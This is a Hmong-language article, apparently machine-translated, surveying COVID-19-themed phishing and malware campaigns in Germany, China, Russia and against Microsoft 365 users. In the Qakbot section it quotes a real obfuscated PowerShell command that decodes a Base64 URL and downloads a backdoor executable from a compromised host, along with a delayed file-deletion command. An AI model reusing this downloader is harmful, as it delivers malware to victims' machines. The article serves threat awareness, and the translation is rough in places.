Cov neeg tawm tsam txuas ntxiv siv cov ncauj lus ntawm COVID-19, tsim kev hem thawj ntau dua rau cov neeg siv uas txaus siab rau txhua yam ntsig txog kev sib kis. IN Peb twb tau tham txog dab tsi ntawm cov malware tshwm sim tom qab tus mob coronavirus, thiab hnub no peb yuav tham txog cov txheej txheem social engineering uas cov neeg siv nyob hauv ntau lub tebchaws, suav nrog Russia, twb tau ntsib. Cov qauv dav dav thiab cov piv txwv nyob hauv qab txiav.
Nco ntsoov hauv Peb tau tham txog qhov tseeb tias tib neeg txaus siab nyeem tsis yog tsuas yog hais txog tus kabmob coronavirus thiab kev kis tus kabmob, tab sis tseem hais txog kev ntsuas nyiaj txiag? Nov yog ib qho piv txwv zoo. Ib qho kev tawm tsam phishing tau pom nyob hauv German xeev North Rhine-Westphalia lossis NRW. Cov neeg tawm tsam tsim cov ntawv luam ntawm Ministry of Economy lub vev xaib (), qhov twg leej twg tuaj yeem thov kev pab nyiaj txiag. Xws li ib qho kev pab cuam yeej muaj, thiab nws tau los ua qhov zoo rau cov neeg dag ntxias. Tau txais cov ntaub ntawv ntiag tug ntawm lawv cov neeg raug tsim txom, lawv tau ua daim ntawv thov ntawm lub vev xaib tiag tiag, tab sis qhia lwm cov ntsiab lus hauv tuam txhab nyiaj. Raws li cov ntaub ntawv raug cai, 4 txhiab qhov kev thov cuav no tau ua kom txog thaum pom cov tswv yim. Yog li ntawd, $ 109 lab npaj rau cov pej xeem cuam tshuam tau poob rau hauv tes ntawm cov neeg dag ntxias.
Koj puas xav kuaj dawb rau COVID-19?
Lwm qhov piv txwv tseem ceeb ntawm tus mob coronavirus-themed phishing yog hauv email. Cov lus tau ntxim nyiam ntawm cov neeg siv nrog kev thov kom kuaj dawb rau tus kabmob coronavirus. Hauv qhov txuas ntawm no muaj xws li Trickbot/Qakbot/Qbot. Thiab thaum cov neeg uas xav kuaj lawv cov kev noj qab haus huv pib "ua tiav daim ntawv txuas," ib tsab ntawv tsis zoo raug rub tawm rau hauv lub computer. Thiab txhawm rau zam kev sim sandboxing, tsab ntawv pib rub tawm tus kab mob tseem ceeb tsuas yog tom qab qee lub sijhawm, thaum cov txheej txheem tiv thaiv tau ntseeg tias tsis muaj kev ua phem yuav tshwm sim.
Convincing feem ntau cov neeg siv kom pab tau macros kuj yooj yim. Txhawm rau ua qhov no, tus txheej txheem ua kom yuam kev tau siv: txhawm rau sau cov lus nug, koj thawj zaug yuav tsum tau qhib macros, uas txhais tau tias koj yuav tsum khiav VBA tsab ntawv.
Raws li koj tuaj yeem pom, VBA tsab ntawv tshwj xeeb yog npog los ntawm antiviruses.
Windows muaj qhov tos tos qhov twg daim ntawv thov tos /T <seconds> ua ntej lees txais cov lus teb "Yog" default. Hauv peb cov ntaub ntawv, tsab ntawv tau tos 65 vib nas this ua ntej tshem tawm cov ntaub ntawv ib ntus:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Thiab thaum tos, malware tau rub tawm. Ib tsab ntawv tshwj xeeb PowerShell tau pib rau qhov no:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Tom qab txiav txim siab tus nqi Base64, PowerShell tsab ntawv rub tawm lub backdoor nyob rau ntawm lub web server yav dhau los hacked los ntawm lub teb chaws Yelemees:
http://automatischer-staubsauger.com/feature/777777.pngthiab txuag nws hauv qab lub npe:
C:UsersPublictmpdirfile1.exe
nplaub tshev βC:UsersPublictmpdirβ raug tshem tawm thaum khiav 'tmps1.bat' cov ntaub ntawv uas muaj cov lus txib cmd /c mkdir ""C:UsersPublictmpdir"".
Lub hom phiaj tawm tsam rau tsoomfwv cov koomhaum
Tsis tas li ntawd, FireEye cov kws tshuaj ntsuam xyuas tsis ntev los no tau tshaj tawm lub hom phiaj APT32 tawm tsam tsom rau tsoomfwv cov qauv hauv Wuhan, nrog rau Tuam Tsev Saib Xyuas Kev Tswj Xyuas Xwm Ceev. Ib qho ntawm RTFs uas tau muab faib muaj qhov txuas mus rau New York Times tsab xov xwm muaj cai . Txawm li cas los xij, thaum nyeem nws, malware tau rub tawm (FireEye cov kws tshuaj ntsuam pom qhov piv txwv li METALJACK).
Interestingly, thaum lub sijhawm kuaj pom, tsis muaj ib qho ntawm cov tshuaj tiv thaiv kab mob tau kuaj pom qhov xwm txheej no, raws li Virustotal.
Thaum lub vev xaib raug cai poob qis
Cov piv txwv zoo tshaj plaws ntawm kev tawm tsam phishing tau tshwm sim hauv Russia tsuas yog hnub dhau los. Yog vim li cas rau qhov no yog lub sijhawm teem sijhawm tos ntev rau cov menyuam yaus hnub nyoog 3 txog 16 xyoo. Thaum pib lees txais cov ntawv thov raug tshaj tawm thaum lub Tsib Hlis 12, 2020, ntau lab tus neeg tau maj nrawm mus rau Lub Xeev Cov Kev Pabcuam lub vev xaib kom tau txais kev pab tos ntev thiab txo qis lub portal tsis muaj qhov phem tshaj qhov kev tawm tsam DDoS. Thaum tus thawj tswj hwm tau hais tias "Tsoomfwv Cov Kev Pabcuam tsis tuaj yeem tiv nrog cov ntawv thov ntws," cov neeg pib tham hauv online txog kev tshaj tawm lwm qhov chaw rau kev txais cov ntawv thov.
Qhov teeb meem yog tias ntau qhov chaw pib ua haujlwm ib zaug, thiab thaum ib qho, qhov tseeb ntawm posobie16.gosuslugi.ru, lees txais cov ntawv thov, ntau dua .
Cov npoj yaig los ntawm SearchInform pom txog 30 qhov kev dag ntxias tshiab hauv thaj tsam .ru. Infosecurity thiab Softline Company tau taug qab ntau dua 70 qhov zoo sib xws ntawm tsoomfwv cov vev xaib pabcuam kev pabcuam txij thaum pib lub Plaub Hlis. Lawv cov neeg tsim khoom siv cov cim paub thiab tseem siv kev sib txuas ntawm cov lus gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, thiab lwm yam.
Hype thiab social engineering
Tag nrho cov piv txwv no tsuas yog lees paub tias cov neeg tawm tsam tau ua tiav cov txiaj ntsig ntawm tus kabmob coronavirus. Thiab qhov siab dua ntawm kev sib raug zoo thiab cov teeb meem tsis meej, qhov ntau dua cov scammers yuav tsum nyiag cov ntaub ntawv tseem ceeb, yuam tib neeg tso lawv cov nyiaj ntawm lawv tus kheej, lossis tsuas yog hack ntau lub computer.
Thiab muab hais tias tus kabmob kis tau yuam kom cov neeg tsis tau npaj txhij mus ua haujlwm hauv tsev, tsis yog tus kheej nkaus xwb, tabsis tseem muaj cov ntaub ntawv koom nrog muaj kev pheej hmoo. Piv txwv li, tsis ntev los no Microsoft 365 (yav tas los Office 365) cov neeg siv kuj raug rau phishing nres. Cov neeg tau txais cov lus "tsis nco qab" lub suab loj heev li txuas rau cov ntawv. Txawm li cas los xij, cov ntaub ntawv yeej yog nplooj ntawv HTML uas xa cov neeg raug tsim txom los ntawm kev tawm tsam . Yog li ntawd, tsis muaj kev nkag mus thiab kev cuam tshuam ntawm tag nrho cov ntaub ntawv los ntawm tus account.
Tau qhov twg los: www.hab.com